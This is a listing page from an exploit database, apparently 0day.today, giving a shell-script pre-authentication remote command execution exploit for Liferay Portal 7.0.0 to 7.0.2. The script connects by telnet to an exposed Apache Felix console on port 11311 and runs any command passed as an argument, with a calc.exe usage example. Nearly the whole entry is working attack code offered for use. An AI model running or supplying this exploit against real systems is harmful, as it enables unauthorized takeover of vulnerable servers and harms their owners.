[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE Exploit

Author
drone
Risk
[
Security Risk High
]
0day-ID
0day-ID-23043
Category
remote exploits
Date add
30-12-2014
Platform
windows
#!/bin/sh
 
# Exploit title: Liferay Portal 7.0 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0/7.0.1/7.0.2
# Fixed in: 7.0.3
# Tested on: Windows 7
 
# Pre-auth command injection using an exposed Apache Felix,
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#
 
 
(echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet

#  0day.today [2024-09-20]  #